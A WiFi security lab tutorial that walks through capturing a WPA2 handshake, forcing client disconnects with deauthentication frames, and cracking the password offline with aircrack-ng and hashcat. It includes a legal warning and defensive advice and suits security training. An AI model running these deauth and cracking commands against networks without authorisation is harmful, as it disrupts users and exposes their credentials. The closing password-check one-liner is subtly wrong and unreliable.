๐ฏ Lab Objectives
- Understand WPA2 handshake-based authentication
- Enable monitor mode on a wireless adapter
- Capture a WPA2 4-way handshake using airodump-ng
- Accelerate capture using a deauthentication attack
- Crack the handshake offline with a wordlist
Legal Warning: Only perform wireless attacks on networks you OWN or have explicit written authorisation to test. Attacking networks without permission is illegal everywhere and carries serious criminal penalties. Use a home test network for this lab.
Step 1 โ WiFi Security Overview
# WiFi security protocols (weakest โ strongest):
WEP โ Broken. Cracked in minutes. Never use.
WPA โ Weak. TKIP-based. Avoid.
WPA2 โ Current standard. Uses AES/CCMP. Vulnerable to offline dictionary attacks.
WPA3 โ Latest. Resistant to offline attacks (SAE handshake). Use when possible.
# How WPA2 authentication works:
1. Client sends authentication request to AP
2. AP responds with a random nonce (ANonce)
3. Client generates PTK (pairwise transient key) using:
โ Password + SSID + ANonce + client nonce (SNonce) + MACs
4. Client sends SNonce + MIC (message integrity code)
5. AP verifies MIC โ if correct, password is right
Attack: capture this 4-way handshake, then brute-force the password OFFLINE
Step 2 โ Enable Monitor Mode
# Requires a wireless adapter that supports monitor mode
# Recommended: Alfa AWUS036ACH or similar (internal card often works too)
# Check your wireless interface
iwconfig
ip link show
# Look for: wlan0, wlan1, etc.
# Kill processes that interfere with monitor mode
sudo airmon-ng check kill
# Enable monitor mode
sudo airmon-ng start wlan0
# Interface is now: wlan0mon (or mon0)
# Verify monitor mode
iwconfig wlan0mon
# Mode: Monitor โ should show this
# To disable monitor mode (when done):
sudo airmon-ng stop wlan0mon
sudo systemctl restart NetworkManager
Step 3 โ Discover Networks
# Scan for all nearby networks
sudo airodump-ng wlan0mon
# Output columns:
BSSID PWR Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID
AA:BB:CC:DD:EE:FF -42 245 5 0 6 54 WPA2 CCMP PSK MyHomeWiFi
# Key columns:
# BSSID โ MAC address of the access point
# CH โ Channel (1-14 for 2.4GHz, 36-165 for 5GHz)
# ENC โ Encryption type (WPA2 = target)
# ESSID โ Network name (SSID)
# Focus on one target network
sudo airodump-ng --bssid AA:BB:CC:DD:EE:FF --channel 6 --write capture wlan0mon
# --bssid: filter to this AP
# --channel: lock to its channel
# --write capture: save to capture-01.cap
Step 4 โ Capture the WPA2 Handshake
# Keep airodump-ng running and wait for a client to (re)connect
# A handshake is captured when a device connects to the AP
# Watch the top-right corner for:
WPA handshake: AA:BB:CC:DD:EE:FF โ handshake captured!
# If no one is connecting, use Step 5 to force a reconnection
# Verify captured handshake:
sudo aircrack-ng capture-01.cap
# If handshake is present, you'll see the SSID and "1 handshake"
Step 5 โ Deauthentication Attack (Speed Up Capture)
# Force a connected client to disconnect โ they auto-reconnect โ handshake captured
# Requires knowing a connected client's MAC (shown in airodump-ng under STATION)
# Send 5 deauth packets to a specific client
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
# -a = AP MAC (BSSID)
# -c = client MAC (STATION)
# --deauth 5 = send 5 deauth frames
# Broadcast deauth (disconnect ALL clients) โ more disruptive
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# Watch airodump-ng window for:
# WPA handshake: AA:BB:CC:DD:EE:FF
# โ Now proceed to cracking
Step 6 โ Crack with Aircrack-ng
# Dictionary attack against the captured handshake
sudo aircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txt
# Specify BSSID if multiple networks were captured
sudo aircrack-ng capture-01.cap -b AA:BB:CC:DD:EE:FF -w /usr/share/wordlists/rockyou.txt
# Output when cracking:
[00:03:24] 246453/9822768 keys tested (1135.27 k/s)
Current passphrase: password123
KEY FOUND! [ supersecretpassword123 ]
# If rockyou fails, try better wordlists:
# /usr/share/seclists/Passwords/WiFi-WPA/probable-v2-wpa-top4800.txt
# /usr/share/wordlists/fasttrack.txt
# Hashcat is MUCH faster (uses GPU):
# First convert to hashcat format:
hcxpcapngtool -o handshake.hc22000 capture-01.cap
hashcat -m 22000 handshake.hc22000 /usr/share/wordlists/rockyou.txt
Step 7 โ Defend Your WiFi
# If aircrack can crack your password, so can an attacker
# Defensive recommendations:
1. Use WPA3 if your router supports it
2. Long, random password (20+ chars) โ dictionary attacks fail
Bad: "password123", "myhouse2024"
Good: "xK9#mP2$vL7qN1@hR5!"
3. Use WPA2-Enterprise (802.1X) for business networks
โ Each user has unique credentials (no shared PSK)
4. Hide SSID? โ useless, attackers can still see it via probe requests
5. MAC filtering? โ weak, MACs can be spoofed easily
6. Regular password rotation for business networks
7. Guest network isolation โ visitors can't reach internal devices
# Test your own password strength:
echo -n "YourSSIDYourPassword" | python3 -c "import sys, hashlib; print(hashlib.pbkdf2_hmac('sha1',sys.stdin.buffer.read(),b'SSID',4096,32).hex())"
Lab Complete! If aircrack-ng can crack your own WiFi password in minutes โ change it immediately. A 20-character random password makes dictionary attacks practically impossible.